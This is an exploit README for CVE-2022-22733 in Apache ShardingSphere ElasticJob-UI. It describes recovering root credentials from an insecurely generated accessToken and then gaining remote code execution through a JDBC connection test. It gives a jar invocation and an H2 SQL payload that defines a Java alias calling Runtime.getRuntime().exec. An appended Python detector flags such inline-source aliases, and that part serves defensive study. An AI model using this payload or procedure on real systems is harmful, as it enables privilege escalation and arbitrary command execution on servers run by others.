Apache ShardingSphere ElasticJob-UI Privilege Escalation & RCE Exploit

Zeyad-Azima/CVE-2022-22733

CVE-2022-22733

CVE-2022-22733 is a vulnerability that affects Apache ShardingSphere ElasticJob-UI 3.0.0 and earlier versions. The vulnerability leads to privilege escalation, and by abusing the escalated privileges a JDBC attack can be performed to achieve RCE. You can read the vulnerability analysis here and the step-by-step exploit-writing blog post here.

The exploit works as follows:

  • Log in with the low-privileged account.
  • Obtain the insecurely generated accessToken.
  • Decode the insecurely generated accessToken.
  • Parse the decoded data from the accessToken.
  • Retrieve the root account credentials from the parsed data.
  • Log in with the root account credentials and obtain full privileges on the application.
  • Send a Connection Test request that abuses the `JDBC` attack.

Usage

You can download the JAR file from here and the source code here.

  • Execute jar:
java -jar CVE-2022-22733.jar
  • SQL script code:
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')
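
For defenders, the script above has a recognizable shape: an alias compiled from inline Java source and then called. The following is an added example (not part of the original repository) of a heuristic Python check for that shape in SQL scripts; the function names, the marker list and the sample scripts are constructed for illustration.

```python
import re

# Constructed samples: the page's script (placeholder command) and two benign scripts.
SAMPLES = {
    "page_script": "CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws "
                   "java.io.IOException {Runtime.getRuntime().exec(cmd);return \"123\";}';"
                   "CALL EXEC ('your_command_here')",
    "benign_alias": 'CREATE ALIAS MY_SQRT FOR "java.lang.Math.sqrt"; CALL MY_SQRT(9)',
    "benign_text": "INSERT INTO notes VALUES ('create alias x as; not code')",
}
# Process-execution markers inside an inline body (assumed, non-exhaustive list).
EXEC_MARKERS = ("Runtime.getRuntime", "ProcessBuilder")
ALIAS_RE = re.compile(
    r"^\s*CREATE\s+ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?(\w+)\b[^']*?\bAS\s+'(.*)'\s*$",
    re.I | re.S)
CALL_RE = re.compile(r"^\s*CALL\s+(\w+)\s*\(", re.I)

def split_statements(script):
    """Split on ';' outside quotes; a naive split would cut the inline Java body."""
    out, buf, quote = [], [], None
    for ch in script:
        if quote:
            quote = None if ch == quote else quote
        elif ch in "'\"":
            quote = ch
        elif ch == ";":
            out.append("".join(buf).strip())
            buf = []
            continue
        buf.append(ch)
    out.append("".join(buf).strip())
    return [s for s in out if s]

def analyze(script):
    """Return (severity, finding, alias) tuples for inline-source aliases and their calls."""
    findings, inline = [], set()
    for stmt in split_statements(script):
        m = ALIAS_RE.match(stmt)
        if m:
            name, body = m.group(1).upper(), m.group(2)
            inline.add(name)
            sev = "high" if any(k in body for k in EXEC_MARKERS) else "review"
            findings.append((sev, "inline-source alias", name))
            continue
        c = CALL_RE.match(stmt)
        if c and c.group(1).upper() in inline:
            findings.append(("high", "call to inline-source alias", c.group(1).upper()))
    return findings

if __name__ == "__main__":
    for label, sql in SAMPLES.items():
        print(label, analyze(sql))
```

An alias bound to an existing method with `FOR` is not flagged; only aliases whose body is supplied as source text are reported, and a process-execution marker in that body raises the severity.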
